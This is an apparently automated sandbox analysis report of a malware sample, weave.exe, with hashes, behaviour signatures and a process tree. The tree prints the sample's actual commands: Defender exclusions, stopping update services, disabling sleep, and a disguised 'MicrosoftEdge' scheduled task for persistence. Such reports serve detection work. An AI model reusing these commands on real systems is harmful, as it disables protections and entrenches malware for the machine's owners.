Analysis
-
max time kernel
15s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
22/08/2024, 09:30
Static task
static1
Behavioral task
behavioral1
Sample
weave.exe
Resource
win11-20240802-en
General
-
Target
weave.exe
-
Size
15.4MB
-
MD5
8232aa26c35a5c0e65e5de1c26dda123
-
SHA1
3d6b0e100f43dc1a4b8ce4c78cbb03169f5001b1
-
SHA256
5abfd9a755941262e7c68d0d64a15260810cd9ec73244287c957c316c587a3e1
-
SHA512
8d289e9c1dc1c184ba50a41363a4eba4f5ed89988cac80353af48325e6cfa465450f0f2c89cf7b2b7b864ff30f4770bae3ad85513479a6a3455038e8f8dc5b63
-
SSDEEP
393216:mqnsH7L9RseITuHE/8zeSL5rFpgRwK1RGWb1j6l:m10dTIZzeSL5x6SK1Rt
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
description pid Process procid_target PID 4656 created 3280 4656 updater.exe 52 PID 4656 created 3280 4656 updater.exe 52 PID 4656 created 3280 4656 updater.exe 52 PID 4656 created 3280 4656 updater.exe 52 PID 4656 created 3280 4656 updater.exe 52 PID 4656 created 3280 4656 updater.exe 52 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cli_gui.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3884 powershell.exe 1596 powershell.exe 1268 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cli_gui.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cli_gui.exe -
Executes dropped EXE 3 IoCs
pid Process 4944 cli_gui.exe 4656 updater.exe 1440 updater.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe -
resource yara_rule behavioral1/files/0x000200000002aabf-7.dat themida behavioral1/memory/4944-18-0x00007FF66B020000-0x00007FF66B85E000-memory.dmp themida behavioral1/memory/4944-35-0x00007FF66B020000-0x00007FF66B85E000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cli_gui.exe -
Power Settings 1 TTPs 5 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2248 cmd.exe 1144 powercfg.exe 872 powercfg.exe 2552 powercfg.exe 4048 powercfg.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\syscfg.cfg weave.exe File created C:\Windows\system32\updater.exe weave.exe File opened for modification C:\Windows\System32\Tasks\MicrosoftEdge svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3004 weave.exe 4944 cli_gui.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4656 set thread context of 4480 4656 updater.exe 98 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Microsoft\Edge\updater.exe updater.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2964 sc.exe 1228 sc.exe 3044 sc.exe 5020 sc.exe 1648 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language weave.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3004 weave.exe 3004 weave.exe 3004 weave.exe 3004 weave.exe 3004 weave.exe 3004 weave.exe 3004 weave.exe 3004 weave.exe 3884 powershell.exe 3884 powershell.exe 4944 cli_gui.exe 4944 cli_gui.exe 4944 cli_gui.exe 4944 cli_gui.exe 4944 cli_gui.exe 4944 cli_gui.exe 4944 cli_gui.exe 4944 cli_gui.exe 4656 updater.exe 4656 updater.exe 1596 powershell.exe 1596 powershell.exe 4656 updater.exe 4656 updater.exe 4656 updater.exe 4656 updater.exe 4656 updater.exe 4656 updater.exe 4656 updater.exe 4656 updater.exe 4480 dialer.exe 4480 dialer.exe 1268 powershell.exe 1268 powershell.exe 4480 dialer.exe 4480 dialer.exe 4944 cli_gui.exe 4944 cli_gui.exe 1268 powershell.exe 4480 dialer.exe 4480 dialer.exe 4480 dialer.exe 4480 dialer.exe 4480 dialer.exe 4480 dialer.exe 4480 dialer.exe 4480 dialer.exe 1268 powershell.exe 4480 dialer.exe 4480 dialer.exe 4656 updater.exe 4656 updater.exe 4480 dialer.exe 4480 dialer.exe 4944 cli_gui.exe 4944 cli_gui.exe 4480 dialer.exe 4480 dialer.exe 4480 dialer.exe 4480 dialer.exe 4480 dialer.exe 4480 dialer.exe 4480 dialer.exe 4480 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3884 powershell.exe Token: SeDebugPrivilege 1596 powershell.exe Token: SeDebugPrivilege 4480 dialer.exe Token: SeShutdownPrivilege 1144 powercfg.exe Token: SeCreatePagefilePrivilege 1144 powercfg.exe Token: SeDebugPrivilege 1268 powershell.exe Token: SeShutdownPrivilege 872 powercfg.exe Token: SeCreatePagefilePrivilege 872 powercfg.exe Token: SeShutdownPrivilege 2552 powercfg.exe Token: SeCreatePagefilePrivilege 2552 powercfg.exe Token: SeShutdownPrivilege 4048 powercfg.exe Token: SeCreatePagefilePrivilege 4048 powercfg.exe Token: SeIncreaseQuotaPrivilege 1268 powershell.exe Token: SeSecurityPrivilege 1268 powershell.exe Token: SeTakeOwnershipPrivilege 1268 powershell.exe Token: SeLoadDriverPrivilege 1268 powershell.exe Token: SeSystemProfilePrivilege 1268 powershell.exe Token: SeSystemtimePrivilege 1268 powershell.exe Token: SeProfSingleProcessPrivilege 1268 powershell.exe Token: SeIncBasePriorityPrivilege 1268 powershell.exe Token: SeCreatePagefilePrivilege 1268 powershell.exe Token: SeBackupPrivilege 1268 powershell.exe Token: SeRestorePrivilege 1268 powershell.exe Token: SeShutdownPrivilege 1268 powershell.exe Token: SeDebugPrivilege 1268 powershell.exe Token: SeSystemEnvironmentPrivilege 1268 powershell.exe Token: SeRemoteShutdownPrivilege 1268 powershell.exe Token: SeUndockPrivilege 1268 powershell.exe Token: SeManageVolumePrivilege 1268 powershell.exe Token: 33 1268 powershell.exe Token: 34 1268 powershell.exe Token: 35 1268 powershell.exe Token: 36 1268 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2648 svchost.exe Token: SeIncreaseQuotaPrivilege 2648 svchost.exe Token: SeSecurityPrivilege 2648 svchost.exe Token: SeTakeOwnershipPrivilege 2648 svchost.exe Token: SeLoadDriverPrivilege 2648 svchost.exe Token: SeSystemtimePrivilege 2648 svchost.exe Token: SeBackupPrivilege 2648 svchost.exe Token: SeRestorePrivilege 2648 svchost.exe Token: SeShutdownPrivilege 2648 svchost.exe Token: SeSystemEnvironmentPrivilege 2648 svchost.exe Token: SeUndockPrivilege 2648 svchost.exe Token: SeManageVolumePrivilege 2648 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2648 svchost.exe Token: SeIncreaseQuotaPrivilege 2648 svchost.exe Token: SeSecurityPrivilege 2648 svchost.exe Token: SeTakeOwnershipPrivilege 2648 svchost.exe Token: SeLoadDriverPrivilege 2648 svchost.exe Token: SeSystemtimePrivilege 2648 svchost.exe Token: SeBackupPrivilege 2648 svchost.exe Token: SeRestorePrivilege 2648 svchost.exe Token: SeShutdownPrivilege 2648 svchost.exe Token: SeSystemEnvironmentPrivilege 2648 svchost.exe Token: SeUndockPrivilege 2648 svchost.exe Token: SeManageVolumePrivilege 2648 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2648 svchost.exe Token: SeIncreaseQuotaPrivilege 2648 svchost.exe Token: SeSecurityPrivilege 2648 svchost.exe Token: SeTakeOwnershipPrivilege 2648 svchost.exe Token: SeLoadDriverPrivilege 2648 svchost.exe Token: SeSystemtimePrivilege 2648 svchost.exe Token: SeBackupPrivilege 2648 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3004 weave.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3004 wrote to memory of 4944 3004 weave.exe 81 PID 3004 wrote to memory of 4944 3004 weave.exe 81 PID 3004 wrote to memory of 4656 3004 weave.exe 83 PID 3004 wrote to memory of 4656 3004 weave.exe 83 PID 4944 wrote to memory of 4632 4944 cli_gui.exe 84 PID 4944 wrote to memory of 4632 4944 cli_gui.exe 84 PID 4632 wrote to memory of 3884 4632 cmd.exe 85 PID 4632 wrote to memory of 3884 4632 cmd.exe 85 PID 4944 wrote to memory of 3732 4944 cli_gui.exe 86 PID 4944 wrote to memory of 3732 4944 cli_gui.exe 86 PID 960 wrote to memory of 2964 960 cmd.exe 91 PID 960 wrote to memory of 2964 960 cmd.exe 91 PID 960 wrote to memory of 1228 960 cmd.exe 92 PID 960 wrote to memory of 1228 960 cmd.exe 92 PID 960 wrote to memory of 3044 960 cmd.exe 93 PID 960 wrote to memory of 3044 960 cmd.exe 93 PID 960 wrote to memory of 5020 960 cmd.exe 94 PID 960 wrote to memory of 5020 960 cmd.exe 94 PID 960 wrote to memory of 1648 960 cmd.exe 95 PID 960 wrote to memory of 1648 960 cmd.exe 95 PID 4656 wrote to memory of 4480 4656 updater.exe 98 PID 2248 wrote to memory of 1144 2248 cmd.exe 101 PID 2248 wrote to memory of 1144 2248 cmd.exe 101 PID 2248 wrote to memory of 872 2248 cmd.exe 102 PID 2248 wrote to memory of 872 2248 cmd.exe 102 PID 2248 wrote to memory of 2552 2248 cmd.exe 103 PID 2248 wrote to memory of 2552 2248 cmd.exe 103 PID 2248 wrote to memory of 4048 2248 cmd.exe 104 PID 2248 wrote to memory of 4048 2248 cmd.exe 104 PID 4480 wrote to memory of 640 4480 dialer.exe 5 PID 4480 wrote to memory of 696 4480 dialer.exe 7 PID 4480 wrote to memory of 1000 4480 dialer.exe 12 PID 4480 wrote to memory of 480 4480 dialer.exe 13 PID 4480 wrote to memory of 560 4480 dialer.exe 14 PID 4480 wrote to memory of 880 4480 dialer.exe 15 PID 4480 wrote to memory of 1064 4480 dialer.exe 16 PID 4480 wrote to memory of 1080 4480 dialer.exe 17 PID 4480 wrote to memory of 1192 4480 dialer.exe 19 PID 4480 wrote to memory of 1232 4480 dialer.exe 20 PID 4480 wrote to memory of 1272 4480 dialer.exe 21 PID 4480 wrote to memory of 1324 4480 dialer.exe 22 PID 4480 wrote to memory of 1372 4480 dialer.exe 23 PID 4480 wrote to memory of 1456 4480 dialer.exe 24 PID 4480 wrote to memory of 1464 4480 dialer.exe 25 PID 4480 wrote to memory of 1532 4480 dialer.exe 26 PID 4480 wrote to memory of 1552 4480 dialer.exe 27 PID 4480 wrote to memory of 1704 4480 dialer.exe 28 PID 4480 wrote to memory of 1744 4480 dialer.exe 29 PID 4480 wrote to memory of 1776 4480 dialer.exe 30 PID 4480 wrote to memory of 1792 4480 dialer.exe 31 PID 4480 wrote to memory of 1828 4480 dialer.exe 32 PID 4480 wrote to memory of 1836 4480 dialer.exe 33 PID 4480 wrote to memory of 1856 4480 dialer.exe 34 PID 4480 wrote to memory of 1984 4480 dialer.exe 35 PID 4480 wrote to memory of 2024 4480 dialer.exe 36 PID 4480 wrote to memory of 2128 4480 dialer.exe 37 PID 4480 wrote to memory of 2212 4480 dialer.exe 39 PID 4480 wrote to memory of 2408 4480 dialer.exe 40 PID 4480 wrote to memory of 2440 4480 dialer.exe 41 PID 4480 wrote to memory of 2448 4480 dialer.exe 42 PID 4480 wrote to memory of 2520 4480 dialer.exe 43 PID 4480 wrote to memory of 2588 4480 dialer.exe 44 PID 4480 wrote to memory of 2608 4480 dialer.exe 45 PID 4480 wrote to memory of 2640 4480 dialer.exe 46 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:640
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:480
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:1000
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:560
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:880
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1232 -
C:\Program Files\Microsoft\Edge\updater.exe"C:\Program Files\Microsoft\Edge\updater.exe"2⤵
- Executes dropped EXE
PID:1440
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1372
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1464
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2056
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1532
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1704
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1776
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1792
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1828
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1856
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1984
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2024
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2128
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2212
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2588
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2608
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2640
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2656
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2604
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1088
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3280
-
C:\Users\Admin\AppData\Local\Temp\weave.exe"C:\Users\Admin\AppData\Local\Temp\weave.exe"2⤵
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Users\Admin\AppData\Local\Temp\cli_gui.exe"C:\Users\Admin\AppData\Local\Temp\cli_gui.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4944 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4972
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\windows\system32'" > NUL 2>&14⤵
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\windows\system32'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵PID:3732
-
-
-
C:\Windows\system32\updater.exe"C:\Windows\system32\updater.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4656
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:960 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2964
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1228
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3044
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:5020
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1648
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1144
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:872
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2552
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4048
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lfvbfbo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MicrosoftEdge' /tr '''C:\Program Files\Microsoft\Edge\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Microsoft\Edge\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MicrosoftEdge' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1268 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3048
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "MicrosoftEdge"2⤵PID:4668
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2468
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3444
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3808
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3872
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3916
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3936
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4364
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:2256
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:2044
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:4948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2304
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1592
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:1684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3676
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1852
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
1Service Execution
1Defense Evasion
Impair Defenses
1Indicator Removal
1Clear Windows Event Logs
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
944B
MD51a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA19910190edfaccece1dfcc1d92e357772f5dae8f7
SHA2560ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA5125d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64
-
Filesize
944B
MD52e0391d00f5bfbc34be70790f14d5edf
SHA1fcb04d8599c23967de4f154a101be480933ab0d0
SHA2561c0c0c86d7c736fc9fb148ac7cd6e67565dc5b76fa116ae3b000a79e91855136
SHA512231b9cc6efb928f0748cef04f287d9204c4f7d2eb4bc27f345e9a1afc6d0675057978ca44d1a95334ee2380709aa6dbe74015fedff8f17611a64efcfb9f64d2a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.9MB
MD5a11c89310149164b7cc9782fb631459b
SHA1bc6500c18cb1e810016046baaf627328dcce1916
SHA256014d7046f92d512642247df3d442144716451f2e638b60c4685aba9e0552e154
SHA512bd41a12a388a08bf9e3fdf1718730f9822433cfb694bd192f6209cc0e9e84784c6598fd7bf5412b1ca873e08b1e62048cf472c9145a602b80ecb50b915e29497
-
Filesize
5.7MB
MD58cd62e3ece85c4c3e9f6f7c816256adf
SHA19712769be3f755c5ecbe68d38800a3a8ecdaf324
SHA25639ebcdbb6993787be2ed9d2b6668b9ee2707ca483a66b51d1302bfc610ba021b
SHA512a0aa9f0e6542c526fc18d48ab945d8be3245900381c9640f6e122a633a15dd9a9364bacd830fbc588a926ebef8240300c1fbf4211eae600cff8b7e2c63613501